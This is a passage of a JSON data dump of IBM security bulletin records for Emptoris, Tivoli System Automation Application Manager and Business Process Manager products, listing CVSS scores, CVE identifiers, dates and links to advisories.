"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T16:15:01", "type": "ibm", "title": "Security Bulletins for Emptoris Contract Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3034", "CVE-2014-3040", "CVE-2014-3041", "CVE-2014-3490", "CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-5042", "CVE-2015-5050", "CVE-2015-7398", "CVE-2015-7450", "CVE-2016-2510", "CVE-2016-3092", "CVE-2016-6018", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T16:15:01", "id": "41A2B080355DFAE7EADFECB4D5D6C7105784D83B969140D731128E3E9EDA0757", "href": "https://www.ibm.com/support/pages/node/783529", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:40:18", "description": "## Question\n\nSecurity Bulletins for Emptoris Strategic Supply Management Platform.\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Strategic Supply Management Platform.** \n \nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details. Please use this information to take the appropriate actions. 
\n \nWe recommend that you subscribe to this article to receive notification of future Security Bulletins and advisories posted here.\n\nNovember 6th 2017\n\n * [**_Security Bulletin: IBM Emptoris Strategic Supply Management is affected by a Cross-Site Request Forgery vulnerability (CVE-2017-1097)_**](<http://www.ibm.com/support/docview.wss?uid=swg22006963>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities addressed in IBM Emptoris Strategic Supply Management (CVE-2016-6021 CVE-2016-6029 CVE-2017-1190)_**](<http://www.ibm.com/support/docview.wss?uid=swg22006799>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n \nJuly 14th 2017\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22004442>)**\n \nJuly 14th 2017\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22003479>)**\n \n \nJune 13th 2017\n\n * **[Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2016-8919)](<http://www-01.ibm.com/support/docview.wss?uid=swg22004642>)**\n \n \nJune 13th 2017\n\n * **[Security Bulletin: Vulnerability in IBM 
WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1121](<http://www.ibm.com/support/docview.wss?uid=swg22004706>)**\n \n \nJune 12th 2017\n\n * **[Security Bulletin: Vulnerability in IBM Websphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1137)](<http://www.ibm.com/support/docview.wss?uid=swg22004666>)**\n \n \nJan 18th 2017\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement **](<http://www-01.ibm.com/support/docview.wss?uid=swg21996820>)\n \n \nMay 2nd 2016\n\n * **[Security Bulletin: Vulnerability in BeanShell affects IBM Emptoris Strategic Supply Management. (CVE-2016-2510)](<http://www.ibm.com/support/docview.wss?uid=swg21982152&myns=swgother&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYRER-OCSSYQ89-_-E>)**\n \nMarch 7 2016\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply **](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[Management](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[** and IBM Emptoris Services Procurement (CVE-2015-7575 CVE-2016-0466 CVE-2015-7417)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)\n \nDecember 1st 2015\n\n * [**Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. 
(CVE-2015-7450)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)\n \n \nNovember 06 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<http://www-01.ibm.com/support/docview.wss?uid=swg21969875>)**\n \nSeptember 18 2015\n\n * [**Security Bulletin: Cross-Site Scripting vulnerabilities affect IBM Emptoris Strategic Supply Management Platform Emptoris Program Management and Emptoris Supplier Lifecycle Management products (CVE-2015-4971 CVE-2015-4939)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21966754>)\n \nAugust 26 2015\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.** ](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)\n \nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n \nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n \nJanuary 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n \nDecember 31 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 
CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n \nSeptember 17 2014\n\n * **[Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_multiple_vulnerabilities_in_ibm_java_sdk_affect_ibm_emptoris_strategic_supply_management_ibm_emptoris_rivermine_telecom_expense_management_and_ibm_emptoris_services_procurement_cve_2014_4263_cve_2014_4244?lang=en_us>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU051\",\"label\":\"N\\/A\"},\"Product\":{\"code\":\"SUPPORT\",\"label\":\"IBM Worldwide Support\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB33\",\"label\":\"N\\/A\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-02T19:28:22", "type": "ibm", "title": "Security Bulletins for Emptoris Strategic Supply Management Platform.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4939", "CVE-2015-4971", "CVE-2015-7417", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0466", "CVE-2016-2510", "CVE-2016-3092", "CVE-2016-6021", "CVE-2016-6029", "CVE-2016-8919", "CVE-2017-1097", "CVE-2017-1121", "CVE-2017-1137", "CVE-2017-1190", "CVE-2017-1380", "CVE-2017-1382"], "modified": "2020-11-02T19:28:22", "id": "B0549540072FC1BB0D803052330E32E656605B46C7EDC1BE259FE2273831E00B", "href": "https://www.ibm.com/support/pages/node/783525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:44:49", "description": "## Summary\n\nIBM Tivoli System Automation Application Manager is shipped as a component of IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, IBM SmartCloud Orchestrator, and IBM SmartCloud Orchestrator Enterprise. Information about security vulnerabilities affecting IBM Tivoli System Automation Application Manager has been published in security bulletins.\n\n## Vulnerability Details\n\nConsult the following security bulletins for IBM Tivoli System Automation Application Manager for vulnerability details and information about fixes: \n\n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-0359)](<http://www-01.ibm.com/support/docview.wss?uid=swg21986467>)\n * [Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982644>)\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager 
(CVE-2016-0306)](<http://www-01.ibm.com/support/docview.wss?uid=swg21981988>)\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager (CVE-2016-0466, CVE-2015-7575, CVE-2016-0448)](<http://www-01.ibm.com/support/docview.wss?uid=swg21977129>)\n * [Security Bulletin: A vulnerability in Apache ActiveMQ affects IBM Tivoli System Automation Application Manager (CVE-2015-5254)](<http://www-01.ibm.com/support/docview.wss?uid=swg21977546>)\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970551>)\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971113>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-3183)](<http://www.ibm.com/support/docview.wss?uid=swg21967198>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-1283)](<http://www.ibm.com/support/docview.wss?uid=swg21967200>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK including Logjam affect IBM Tivoli System Automation Application Manager (CVE-2015-4000, CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963331>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application 
Manager 4.1 (CVE-2015-1946)](<http://www.ibm.com/support/docview.wss?uid=swg21963233>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application Manager 4.1 (CVE-2015-1927)](<http://www.ibm.com/support/docview.wss?uid=swg21963673>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application Manager 4.1 (CVE-2015-1885)](<http://www.ibm.com/support/docview.wss?uid=swg21963672>) \n \n\n * [Security Bulletin: Vulnerability in Diffie-Hellman ciphers affects IBM Tivoli System Automation Application Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21960859>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application Manager 4.1 (CVE-2015-1920)](<http://www.ibm.com/support/docview.wss?uid=swg21957955>) \n \n\n * Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager (CVE-2014-3566, CVE-2014-6457) \n\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager (CVE-2014-6593, CVE-2015-0410, CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21698238>) \n \n\n * [Security Bulletin: Vulnerability in RC4 stream cipher affects IBM Tivoli System Automation Application Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21882751>)\n\n## Affected Products and Versions\n\n** Principal Product and Version** | ** Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator 2.5, 2.4, 2.4.0.3, 2.4.0.2, and 2.4.0.1; IBM Cloud Orchestrator Enterprise 2.5.0.2, 
2.5.0.1, 2.4, 2.4.0.3, 2.4.0.2 and 2.4.0.1 | IBM Tivoli System Automation Application Manager 4.1 \nIBM SmartCloud Orchestrator 2.3 and 2.3.0.1; IBM SmartCloud Orchestrator Enterprise 2.3 and 2.3.0.1 | IBM Tivoli System Automation Application Manager 3.2.2 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3566", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0138", "CVE-2015-0410", "CVE-2015-1283", "CVE-2015-1885", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1931", "CVE-2015-1946", "CVE-2015-2017", "CVE-2015-2601", "CVE-2015-2613", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-3183", "CVE-2015-4000", "CVE-2015-4749", "CVE-2015-5254", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0306", "CVE-2016-0359", "CVE-2016-0448", "CVE-2016-0466", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T22:30:51", "id": 
"B9410A108CEB6D3C9DFE0C1617FB34D181E021D243C3FB7F5DB35969D7C4CE52", "href": "https://www.ibm.com/support/pages/node/261351", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:44:47", "description": "## Summary\n\nIBM Business Process Manager is shipped as a component of IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, IBM SmartCloud Orchestrator, and IBM SmartCloud Orchestrator Enterprise.\n\n## Vulnerability Details\n\nReview the following security bulletins for IBM Business Process Manager for vulnerability details and information about fixes. \n \n\n\n * [Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, WebSphere Process Server, WebSphere Dynamic Process Edition, and WebSphere Lombardi Edition](<http://www-01.ibm.com/support/docview.wss?uid=swg21986205>)\n * [IBM Security Bulletin: Cross Site Scripting vulnerability in IBM Business Process Manager (CVE-2016-5901)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990852>)\n * [IBM Security Bulletin: HTML injection vulnerability in Business Space might affect IBM Business Process Manager (CVE-2016-3056)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990850>)\n * [IBM Security Bulletin: Security vulnerabilities in IBM SDK for Node.js might affect IBM Business Process Manager (BPM) Configuration Editor (CVE-2014-9748, CVE-2016-1669)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990841>)\n * [IBM Security Bulletin: Security vulnerabilities in Apache Struts might affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2016-1181, CVE-2016-1182, CVE-2015-0899)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990834>)\n * [Security Bulletin: A Security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, 
WebSphere Process Server and WebSphere Lombardi Edition (CVE-2015-0254)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985316>)\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (Java CPU April 2016)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982559>)\n * [Security Bulletin: A Security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (CVE-2016-0306)](<http://www-01.ibm.com/support/docview.wss?uid=swg21981008>)\n * [Security Bulletin: Multiple security vulnerabilities in Business Space affect IBM Business Process Manager and WebSphere Process Server (CVE-2015-7407, CVE-2015-7400, CVE-2015-7454)](<http://www-01.ibm.com/support/docview.wss?uid=swg21972005>)\n * [Security Bulletin: Cross-Site scripting vulnerability in IBM Business Process Manager document list control (CVE-2016-0227)](<http://www-01.ibm.com/support/docview.wss?uid=swg21978058>)\n \n\n\n * [Security Bulletin: Multiple Cross-Site scripting vulnerabilities in IBM Business Process Manager Process Portal (CVE-2015-8524)](<http://www-01.ibm.com/support/docview.wss?uid=swg21974472>)\n * [Security Bulletin: IBM Business Process Manager authorization checks for process and task deletion are insufficient (CVE-2015-7463)](<http://www-01.ibm.com/support/docview.wss?uid=swg21973442>)\n * [Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2016-0483, CVE-2016-0475, CVE-2016-0466, CVE-2015-7575, CVE-2016-0448)](<http://www-01.ibm.com/support/docview.wss?uid=swg21977021>)\n \n\n\n * [Security Bulletin: A Security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, 
WebSphere Process Server and WebSphere Lombardi Edition (CVE-2015-7417)](<http://www.ibm.com/support/docview.wss?uid=swg21975121&myns=swgws&mynp=OCSSFTDH&mynp=OCSSFTBX&mynp=OCSSFTN5&mynp=OCSSFPRP&mynp=OCSSQH9M&mync=E&cm_sp=swgws-_-OCSSFTDH-OCSSFTBX-OCSSFTN5-OCSSFPRP-OCSSQH9M-_-E>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Process Designer used in IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-2613, CVE-2015-2601, CVE-2015-4749, CVE-2015-2625, CVE-2015-1931, CVE-2015-4872)](<http://www-01.ibm.com/support/docview.wss?uid=swg21972165>) \n \n\n * [Security Bulletin: Vulnerabilities in IBM SDK for Node.js affect IBM Business Process Manager Configuration Editor (CVE-2015-8027, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196)](<http://www-01.ibm.com/support/docview.wss?uid=swg21974459>) \n \n\n * [Security Bulletin: Vulnerability in Apache Commons affects IBM Business Process Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21972046>) \n \n\n * [Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21970332>) \n \n\n * [Security Bulletin: Multiple Cross-Site scripting vulnerabilities in IBM Business Process Manager dashboards (CVE-2015-4955)](<http://www.ibm.com/support/docview.wss?uid=swg21966010>) \n \n\n * [Security Bulletin: IBM Business Process Manager (BPM) document store is susceptible to XXE (XML External Entity) attacks. 
(CVE-2013-5452)](<http://www.ibm.com/support/docview.wss?uid=swg21963014>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-1932, CVE-2015-4938, CVE-2015-1946)](<http://www.ibm.com/support/docview.wss?uid=swg21965001>) \n \n\n * [Security Bulletin: Missing authorization concept for document upload and download in IBM Business Process Manager (BPM) CMIS integration (CVE-2015-1904)](<http://www.ibm.com/support/docview.wss?uid=swg21960293>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager and WebSphere Lombardi Edition (Java CPU July 2015 - CVE-2015-2613, CVE-2015-2601, CVE-2015-4749, CVE-2015-2625, CVE-2015-1931)](<http://www.ibm.com/support/docview.wss?uid=swg21962805>) \n \n\n * [Security Bulletin: Multiple security vulnerabilities in ElasticSearch might affect Process Federation Server (PFS) in IBM Business Process Manager (BPM) - CVE-2015-5531, CVE-2015-5377](<http://www.ibm.com/support/docview.wss?uid=swg21964010>) \n \n\n * [Security Bulletin: Cross-site scripting vulnerabilities in IBM Business Process Manager (BPM) and WebSphere Lombardi Edition (WLE) error handling (CVE-2015-0193)](<http://www.ibm.com/support/docview.wss?uid=swg21697944>) \n \n\n * [Security Bulletin: Vulnerabilities in IBM SDK for Node.js affect IBM Business Process Manager Configuration Editor (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204, CVE-2015-0205, CVE-2015-0206)](<http://www.ibm.com/support/docview.wss?uid=swg21699938>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager and WebSphere Lombardi Edition 
(CVE-2015-1885, CVE-2015-1946, CVE-2015-1927)](<http://www.ibm.com/support/docview.wss?uid=swg21699938>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Business Process Manager (BPM), WebSphere Process Server (WPS), and WebSphere Lombardi Edition (WLE): CVE-2015-1920](<http://www.ibm.com/support/docview.wss?uid=swg21903346>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM SDK Java\u2122 Technology Edition affect IBM Business Process Manager and WebSphere Lombardi Edition April 2015 CPU (CVE-2015-0488, CVE-2015-0478, CVE-2015-1916)](<http://www.ibm.com/support/docview.wss?uid=swg21959306>) \n \n\n * [Security Bulletin: Vulnerability with Diffie-Hellman ciphers may affect WebSphere Lombardi Edition and IBM Business Process Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959097>) \n \n\n * [Security Bulletin: Vulnerability in RC4 stream cipher affects WebSphere Lombardi Edition and IBM Business Process Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21882624>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM SDK Java\u2122 Technology Edition affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-0138 CVE-2014-6593 CVE-2015-0400 CVE-2015-0410)](<http://www.ibm.com/support/docview.wss?uid=swg21699935>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM SDK for Java Technology Edition affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2014-6512, CVE-2014-6457, CVE-2014-6558, CVE-2014-3566)](<http://www.ibm.com/support/docview.wss?uid=swg21692787>) \n \n\n * [Security Bulletin: Vulnerability in SSLv3 affects IBM Business Process Manager (CVE-2014-3566)](<http://www.ibm.com/support/docview.wss?uid=swg21689466>) \n \n\n * [Security Bulletin: TLS 
padding vulnerability affects IBM HTTP Server shipped with IBM Business Process Manager family products (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21692582>)\n * Security Bulletin: Cross-Site Scripting vulnerabilities in Dojo affect IBM Business Process Manager (BPM), WebSphere Lombardi Edition (WLE), and WebSphere Process Server (WPS) - CVE-2014-8917\n\n## Affected Products and Versions\n\n** Principal Product and Version** | ** Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator 2.5, 2.5.0.1, 2.5.0.1 Interim Fix1, 2.5.0.2; IBM Cloud Orchestrator Enterprise 2.5.0.1, 2.5.0.1 Interim Fix1, 2.5.0.2 | IBM Business Process Manager Standard 8.5.6 \nIBM Cloud Orchestrator 2.4, 2.4.0.1, 2.4.0.2, 2.4.0.3; IBM Cloud Orchestrator Enterprise 2.4, 2.4.0.1, 2.4.0.2, 2.4.0.3 | IBM Business Process Manager Standard 8.5.0.1 \nIBM SmartCloud Orchestrator 2.3 and 2.3.0.1; IBM SmartCloud Orchestrator Enterprise 2.3 and 2.3.0.1 | IBM Business Process Manager Standard 8.5 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5452", "CVE-2014-3566", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-6457", "CVE-2014-6512", "CVE-2014-6558", "CVE-2014-6593", "CVE-2014-8275", "CVE-2014-8730", "CVE-2014-8917", "CVE-2014-9748", "CVE-2015-0138", "CVE-2015-0193", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0254", "CVE-2015-0400", "CVE-2015-0410", "CVE-2015-0478", "CVE-2015-0488", "CVE-2015-0899", "CVE-2015-1885", "CVE-2015-1904", "CVE-2015-1916", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1931", "CVE-2015-1932", "CVE-2015-1946", "CVE-2015-2017", "CVE-2015-2601", "CVE-2015-2613", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-4000", "CVE-2015-4734", "CVE-2015-4749", "CVE-2015-4872", "CVE-2015-4938", "CVE-2015-4955", "CVE-2015-5006", "CVE-2015-5377", "CVE-2015-5531", "CVE-2015-7400", "CVE-2015-7407", "CVE-2015-7417", "CVE-2015-7450", "CVE-2015-7454", "CVE-2015-7463", "CVE-2015-7575", "CVE-2015-8027", "CVE-2015-8524", "CVE-2016-0227", "CVE-2016-0306", "CVE-2016-0448", "CVE-2016-0466", "CVE-2016-0475", "CVE-2016-0483", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1669", "CVE-2016-3056", "CVE-2016-5901"], "modified": "2018-06-17T22:30:51", "id": 